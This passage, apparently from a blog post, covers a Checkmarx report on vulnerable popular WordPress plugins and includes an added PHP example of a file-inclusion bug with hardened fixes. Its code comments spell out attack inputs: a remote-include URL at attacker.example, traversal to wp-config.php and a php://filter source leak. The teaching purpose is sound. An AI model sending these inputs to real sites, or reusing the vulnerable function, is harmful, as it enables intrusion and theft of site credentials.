4. The vulnerable plugins among the top 50 span a range of general plugin types. These include, but are not limited to, plugins used for:
- Ecommerce, such as a shopping cart
- Content management, such as feed aggregators, related links and checking of broken links
- Site development, such as APIs for web development and transforming a website to a mobile app
- Social networks - from linking to Facebook to establishing an internal organization network.
5. Only six plugins were completely fixed in a six-month period, although every plugin released new versions during that time. A first scan, run in January 2013, showed a higher rate of vulnerable plugins: more than a third (18 out of 50) were vulnerable, and together those vulnerable plugins accounted for nearly 18.5 million downloads. That first scan also found RFI/LFI (remote/local file inclusion) vulnerabilities. The second scan, conducted in early June 2013, was performed on the updated versions of all the plugins, but only six of those updates were free of the previously found vulnerabilities. These were:
- BuddyPress - creates a social network for the organization. Downloads: 1,319,743. Alerted by Checkmarx to their vulnerabilities.
- BBPress - forum software. Downloads: 483,283. Alerted by Checkmarx to their vulnerabilities.
- E-Commerce - shopping cart plugin. Downloads: 2,209,352. Alerted by Checkmarx to their vulnerabilities.
- Woo Commerce - an ecommerce store. Downloads: 469,503. Alerted by Checkmarx to their vulnerabilities.
- W3 Total Cache - site optimization by caching. Downloads: 1,450,980. Most likely fixed as part of a security overhaul following an external full disclosure of some vulnerabilities.
- Super Cache - site optimization by caching. Downloads: 3,984,976. Most likely fixed as part of a security overhaul as with W3 Total Cache.
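The RFI/LFI finding from the first scan is worth making concrete, because it is the easiest plugin bug to spot and to fix. What follows is an added example, not code from the Checkmarx report or from any of the plugins named above; the function names, the `tab` parameter and the `tabs/` directory are assumptions chosen for illustration. It shows the include pattern the report's RFI/LFI category refers to, beside a hardened version that maps the request value through a fixed allowlist.

```php
<?php
// Added example (not from the Checkmarx report or any named plugin).
// A settings page that picks which template file to include from a
// request parameter. This is the classic plugin file-inclusion bug.

// VULNERABLE: the request controls the include path.
// With allow_url_include=On, ?tab=http://attacker.example/shell is RFI.
// Otherwise ?tab=../../../wp-config still reads wp-config.php (LFI), and
// php://filter/convert.base64-encode/resource=... leaks arbitrary source.
function render_tab_vulnerable() {
    $tab = isset($_GET['tab']) ? $_GET['tab'] : 'general';
    // Appending '.php' does not help: traversal lands on a real .php file.
    include dirname(__FILE__) . '/tabs/' . $tab . '.php';
}

// HARDENED: the request value is only ever a key into a fixed table.
// The attacker-controlled string never reaches the filesystem.
function render_tab_hardened() {
    $templates = array(
        'general'  => 'general.php',
        'advanced' => 'advanced.php',
    );
    $tab = isset($_GET['tab']) ? (string) $_GET['tab'] : 'general';
    if (!array_key_exists($tab, $templates)) {
        $tab = 'general'; // unknown value: fall back, do not echo it
    }
    include dirname(__FILE__) . '/tabs/' . $templates[$tab];
}

// Defence in depth for the case where the file set must be dynamic:
// resolve the path and require that it stays inside the intended directory.
function include_within_dir($base_dir, $name) {
    $base = realpath($base_dir);
    $path = realpath($base_dir . '/' . $name . '.php');
    if ($base === false || $path === false) {
        return false;
    }
    // Path must start with the base directory followed by a separator.
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    include $path;
    return true;
}
```

The allowlist form is preferable to the `realpath` check: it removes the class of bug rather than filtering it, and it does not depend on the file existing at check time. A quick audit of an installed site for the vulnerable pattern is `grep -rnE '(include|require)(_once)?\s*\(?.*\$_(GET|POST|REQUEST|COOKIE)' wp-content/plugins/`, which flags any include whose path is built directly from request data and is how a practitioner would triage a plugin before trusting its download count.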
To me this is the same kind of problem we see in the Google Play store and other online marketplaces. Apps and plugins are a great way to add functionality to everything from phones and tablets to your cloud instances and your website, but do you trust what you download from your marketplace?
The marketplace or app store has become a feature in so many places today. As consumers in these marketplaces, we tend to assume that because something has been approved for an app store or marketplace it must be safe. This Checkmarx report shows once again that that isn't necessarily true: a plugin can sit in the directory, be updated, and be downloaded millions of times while its known vulnerabilities remain unfixed. What should the security expectations be for applications, plugins or programs you use from a marketplace?
To give Apple its due, one of the strengths of the iTunes App Store is that, for the most part, apps that are approved have been checked for security risks. Google has recently done a better job of checking for security. But there are so many third-party marketplaces: Amazon's and Rackspace's cloud marketplaces, for instance, or the WordPress plugin directory.